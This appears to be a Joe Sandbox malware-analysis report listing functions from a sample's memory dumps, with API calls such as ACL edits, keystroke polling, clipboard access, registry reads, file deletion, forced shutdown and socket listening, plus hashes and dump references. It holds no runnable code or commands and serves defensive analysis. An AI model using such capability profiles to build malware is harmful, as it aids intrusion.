Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: abaa931b7a3de17ee2f7780283290b8f19926ad50dcc64ec63874bab9c1e0f61
Instruction ID: 1ea240b3c3fa6df43579731125787921b88eb9dc2fe9db2dda845910b0022ed8
Opcode Fuzzy Hash: abaa931b7a3de17ee2f7780283290b8f19926ad50dcc64ec63874bab9c1e0f61
Instruction Fuzzy Hash: AE31937260121A6ACF20EB64EC88EFE7BECDF49361F1042F5E854A35E0DB70DA45CA54

Function 00AF81F7 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00AF874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00AF8766
Part of subcall function 00AF874A: GetLastError.KERNEL32(?,00AF822A,?,?,?), ref: 00AF8770
Part of subcall function 00AF874A: GetProcessHeap.KERNEL32(00000008,?,?,00AF822A,?,?,?), ref: 00AF877F
Part of subcall function 00AF874A: HeapAlloc.KERNEL32(00000000,?,00AF822A,?,?,?), ref: 00AF8786
Part of subcall function 00AF874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00AF879D

Part of subcall function 00AF87E7: GetProcessHeap.KERNEL32(00000008,00AF8240,00000000,00000000,?,00AF8240,?), ref: 00AF87F3
Part of subcall function 00AF87E7: HeapAlloc.KERNEL32(00000000,?,00AF8240,?), ref: 00AF87FA
Part of subcall function 00AF87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00AF8240,?), ref: 00AF880B

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00AF825B
_memset.LIBCMT ref: 00AF8270
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00AF828F
GetLengthSid.ADVAPI32(?), ref: 00AF82A0
GetAce.ADVAPI32(?,00000000,?), ref: 00AF82DD
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00AF82F9
GetLengthSid.ADVAPI32(?), ref: 00AF8316
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00AF8325
HeapAlloc.KERNEL32(00000000), ref: 00AF832C
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00AF834D
CopySid.ADVAPI32(00000000), ref: 00AF8354
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00AF8385
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00AF83AB
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00AF83BF

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 7d759e3e1b25185ac518b3a272655d4bc55e5288f3771d3d6c382793feb9b172
Instruction ID: 52eb5db706fbff69ff4156fa7f033d094b114aa0f93f4aca531a53e1d6ee236d
Opcode Fuzzy Hash: 7d759e3e1b25185ac518b3a272655d4bc55e5288f3771d3d6c382793feb9b172
Instruction Fuzzy Hash: CF615D7190021AABDF109F94DD45EFEBBB9FF04700F148229F915AB2A1DB399A05DB60

Function 00AB6843 Relevance: 18.4, Strings: 14, Instructions: 883COMMON

Download Yara Rule

Strings

ANYCRLF), xrefs: 00AF1734
LF), xrefs: 00AF16DD
CR), xrefs: 00AF16C0
CRLF), xrefs: 00AF16FA
BSR_UNICODE), xrefs: 00AF1771
NO_AUTO_POSSESS), xrefs: 00AF1567
LIMIT_RECURSION=, xrefs: 00AF1635
BSR_ANYCRLF), xrefs: 00AF1757
UTF16), xrefs: 00AF1508
NO_START_OPT), xrefs: 00AF1588
ANY), xrefs: 00AF1717
UTF), xrefs: 00AF1533
UCP), xrefs: 00AF1546
LIMIT_MATCH=, xrefs: 00AF15A9

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID:
String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
API String ID: 0-4052911093
Opcode ID: eebfd8ed16693e7eaad72211a7bd3eb519f2339a8f501749ae178d8d8505374b
Instruction ID: b245a4b6b38fdddf3b904e0ecd575e50ad7c2e875032d581fdf5e304500968b2
Opcode Fuzzy Hash: eebfd8ed16693e7eaad72211a7bd3eb519f2339a8f501749ae178d8d8505374b
Instruction Fuzzy Hash: EE725E75E00219DBDB24DF99C8807FEB7F5EF48310F1481AAE949EB291EB749941CB90

Function 00B20665 Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B210A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B20038,?,?), ref: 00B210BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B20737

Part of subcall function 00AA9997: __itow.LIBCMT ref: 00AA99C2
Part of subcall function 00AA9997: __swprintf.LIBCMT ref: 00AA9A0C

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00B207D6
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00B2086E
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00B20AAD
RegCloseKey.ADVAPI32(00000000), ref: 00B20ABA

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: b8708e2500839f3f0d6bf9320cf49a8570ebe4d6b88f6ca8008f2ced2a31172b
Instruction ID: a2e1dc816a68b3a66bbdb64f6717d284cf2f14fb9849345ea9f49d07879c7b1d
Opcode Fuzzy Hash: b8708e2500839f3f0d6bf9320cf49a8570ebe4d6b88f6ca8008f2ced2a31172b
Instruction Fuzzy Hash: 2BE13D31214211AFCB14EF28D995E6BBBF9EF89714B04856DF44ADB2A2DB30ED01CB51

Function 00B00219 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00B00241
GetAsyncKeyState.USER32(000000A0), ref: 00B002C2
GetKeyState.USER32(000000A0), ref: 00B002DD
GetAsyncKeyState.USER32(000000A1), ref: 00B002F7
GetKeyState.USER32(000000A1), ref: 00B0030C
GetAsyncKeyState.USER32(00000011), ref: 00B00324
GetKeyState.USER32(00000011), ref: 00B00336
GetAsyncKeyState.USER32(00000012), ref: 00B0034E
GetKeyState.USER32(00000012), ref: 00B00360
GetAsyncKeyState.USER32(0000005B), ref: 00B00378
GetKeyState.USER32(0000005B), ref: 00B0038A

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 218412bb06ebd0882c54bb30f86f093b030b23d9e7dba488d91e374d8353d0c7
Instruction ID: 8affda913c9f80e9eaf3c3f2d709a1b42cfd5b753ff4575f764e108dfc6e8bab
Opcode Fuzzy Hash: 218412bb06ebd0882c54bb30f86f093b030b23d9e7dba488d91e374d8353d0c7
Instruction Fuzzy Hash: 89419C345147CA6EFF326A6484083B5BEE0EF26344F0881DDD9C6571C2DB9459C48796

Function 00B186D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA9997: __itow.LIBCMT ref: 00AA99C2
Part of subcall function 00AA9997: __swprintf.LIBCMT ref: 00AA9A0C

CoInitialize.OLE32 ref: 00B18718
CoUninitialize.OLE32 ref: 00B18723
CoCreateInstance.OLE32(?,00000000,00000017,00B32BEC,?), ref: 00B18783
IIDFromString.OLE32(?,?), ref: 00B187F6
VariantInit.OLEAUT32(?), ref: 00B18890
VariantClear.OLEAUT32(?), ref: 00B188F1

Strings

Invalid parameter, xrefs: 00B1880F
Failed to create object, xrefs: 00B1878E, 00B18844
NULL Pointer assignment, xrefs: 00B187C8

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 3f557fa78333ee065c6bf0249f71eca689871e4ca3c7700a9a9a2975e0c75416
Instruction ID: 8927aad307242aeeb695b4aff37e7bb560299adc83eb1200f4085467f106ba55
Opcode Fuzzy Hash: 3f557fa78333ee065c6bf0249f71eca689871e4ca3c7700a9a9a2975e0c75416
Instruction Fuzzy Hash: EC618C706083019FD710DF64C984BABBBE4FF49714F504999F9859B2A1DB70ED88CB92

Function 00B14458 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00B1447F
EmptyClipboard.USER32 ref: 00B14485
GlobalAlloc.KERNEL32(00000002,?), ref: 00B1449A
CloseClipboard.USER32 ref: 00B14539

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: a386798f5bd0e77d62f50cba9c69447015dbdf0455fb32ee63fff281ace92856
Instruction ID: 098d542c74692cb4926d992ce5f01e9530f3a9af5819c9250803561dfe45786c
Opcode Fuzzy Hash: a386798f5bd0e77d62f50cba9c69447015dbdf0455fb32ee63fff281ace92856
Instruction Fuzzy Hash: E3218B35200211AFDB21AF60ED49BBA77B9EF04750F10806AF946DB2B1DF74AD02CB54

Function 00B03A2B Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AA48A1,?,?,00AA37C0,?), ref: 00AA48CE

Part of subcall function 00B04CD3: GetFileAttributesW.KERNEL32(?,00B03947), ref: 00B04CD4

FindFirstFileW.KERNEL32(?,?), ref: 00B03ADF
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00B03B87
MoveFileW.KERNEL32(?,?), ref: 00B03B9A
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00B03BB7
FindNextFileW.KERNEL32(00000000,00000010), ref: 00B03BD9
FindClose.KERNEL32(00000000,?,?,?,?), ref: 00B03BF5

Strings

\*.*, xrefs: 00B03A8A, 00B03A93, 00B03AA8

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: 879678eb6688e37a545f99af02fdb71ba06d1bd4a7a9b037c1fa4f78f40be3e7
Instruction ID: 109442e9250642f19672cf8410be41be2eed3be635ca0f9dc18747844799ef85
Opcode Fuzzy Hash: 879678eb6688e37a545f99af02fdb71ba06d1bd4a7a9b037c1fa4f78f40be3e7
Instruction Fuzzy Hash: 76517F319012499ACF15EBA0CE969FEBBF9AF15704F6441A9E442770D1EF316F09CBA0

Function 00B0F65E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA7F41: _memmove.LIBCMT ref: 00AA7F82

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00B0F6AB
Sleep.KERNEL32(0000000A), ref: 00B0F6DB
_wcscmp.LIBCMT ref: 00B0F6EF
_wcscmp.LIBCMT ref: 00B0F70A
FindNextFileW.KERNEL32(?,?), ref: 00B0F7A8
FindClose.KERNEL32(00000000), ref: 00B0F7BE

Strings

*.*, xrefs: 00B0F690

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
String ID: *.*
API String ID: 713712311-438819550
Opcode ID: 89c51b4bc9bccb1fa704bf051f7d9084ad605f1a90f16f542e53a6ee14b90ee5
Instruction ID: 055dcf68b99ca290c67a13e6afc0fb36a6bb544631435ede87bd9e72af60871e
Opcode Fuzzy Hash: 89c51b4bc9bccb1fa704bf051f7d9084ad605f1a90f16f542e53a6ee14b90ee5
Instruction Fuzzy Hash: FC415B71A0421A9BCF21DF64CD89AFEBBF4EF05350F1445A6E815A32E0EB319E45CB91

Function 00AB4140 Relevance: 11.6, APIs: 1, Strings: 5, Instructions: 1132COMMON

Download Yara Rule

Strings

VUUU, xrefs: 00AB4520
VUUU, xrefs: 00AE7B0C
ERCP, xrefs: 00AB421F
VUUU, xrefs: 00AB44ED
VUUU, xrefs: 00AB44DB

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1546025612
Opcode ID: dea3bd21e9f9c81c5ec2a5b10e1f69ff3a4e1942fedb777e10651fe5846711b2
Instruction ID: 6963e6417b994c9b7a01d18c4f3823c4433184bc36fefafe8e3fe8bd927129cd
Opcode Fuzzy Hash: dea3bd21e9f9c81c5ec2a5b10e1f69ff3a4e1942fedb777e10651fe5846711b2
Instruction Fuzzy Hash: 4DA29E70E0425ACBDF24CF59C9907EDB7B5BF58314F2481AAD85AA7282E7349E81DF40

Function 00AB58C0 Relevance: 11.0, APIs: 7, Instructions: 532COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00AB5A05
_memmove.LIBCMT ref: 00AB5A55
_memmove.LIBCMT ref: 00AB5ABB

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 673f58b0ee803a0cc5d4c1b04fb851a6d975334b656d61f8c6e907c8b2ad9525
Instruction ID: db2016c718d925c10f486fa3c01e6daaece333af27fc07bd7a7eadc0e7b2ca1a
Opcode Fuzzy Hash: 673f58b0ee803a0cc5d4c1b04fb851a6d975334b656d61f8c6e907c8b2ad9525
Instruction Fuzzy Hash: 6A125970E00609DBDF14DFA5DA85AEEB7F9FF48300F204669E406A7292EB35AD11CB50

Function 00B0545F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00AF8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00AF8D0D
Part of subcall function 00AF8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00AF8D3A
Part of subcall function 00AF8CC3: GetLastError.KERNEL32 ref: 00AF8D47

ExitWindowsEx.USER32(?,00000000), ref: 00B0549B

Strings

, xrefs: 00B05489
@, xrefs: 00B0548E
SeShutdownPrivilege, xrefs: 00B0546B

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 6b29ad99fbcc66601557387cac5f47c0c0b262b20ae45eb74aacc63a7c20bc75
Instruction ID: 860f934b0da0ffc016ff544f9e59e4f83ea91cf78e55347f7a9358f1e12093cb
Opcode Fuzzy Hash: 6b29ad99fbcc66601557387cac5f47c0c0b262b20ae45eb74aacc63a7c20bc75
Instruction Fuzzy Hash: CE014771654A066AF7386674DC8AFFF7AE8EB05743F2005F0FD07D26D6DA540C8089A0

Function 00B16596 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00B165EF
WSAGetLastError.WSOCK32(00000000), ref: 00B165FE
bind.WSOCK32(00000000,?,00000010), ref: 00B1661A
listen.WSOCK32(00000000,00000005), ref: 00B16629
WSAGetLastError.WSOCK32(00000000), ref: 00B16643
closesocket.WSOCK32(00000000,00000000), ref: 00B16657

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 77941fe5ba4ff0e7c93d6606549633e5268cc5c1175647b29b83f0c63317f78e
Instruction ID: 676c58ba87f32f143ce4f2ded072a8eb6bdaa841420afca1c8a46ebf2324d636
Opcode Fuzzy Hash: 77941fe5ba4ff0e7c93d6606549633e5268cc5c1175647b29b83f0c63317f78e
Instruction Fuzzy Hash: 81217E31600605DFCB10EF64C985ABEB7F9EF49720F1481A9F956A72E1CB70AD428B51

Function 00AB5680 Relevance: 8.0, APIs: 5, Instructions: 516COMMON

Download Yara Rule

APIs

Part of subcall function 00AC0FF6: std::exception::exception.LIBCMT ref: 00AC102C
Part of subcall function 00AC0FF6: __CxxThrowException@8.LIBCMT ref: 00AC1041

_memmove.LIBCMT ref: 00AF062F
_memmove.LIBCMT ref: 00AF0744
_memmove.LIBCMT ref: 00AF07EB

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: _memmove$Exception@8Throwstd::exception::exception
String ID:
API String ID: 1300846289-0
Opcode ID: defe86f6dfe2cc44166a70e32a4103c612b3fbcb5f1b5b62a238f10cbc3248e3
Instruction ID: 33f2ef51877d2f0af4d45c47157a49d242e77c73361942657b92028b518a5d26
Opcode Fuzzy Hash: defe86f6dfe2cc44166a70e32a4103c612b3fbcb5f1b5b62a238f10cbc3248e3
Instruction Fuzzy Hash: 2A0260B0E00209DBDF04DFA4D981ABEBBB5EF44300F1580A9F906DB296EB35D955CB91

Function 00AA1287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

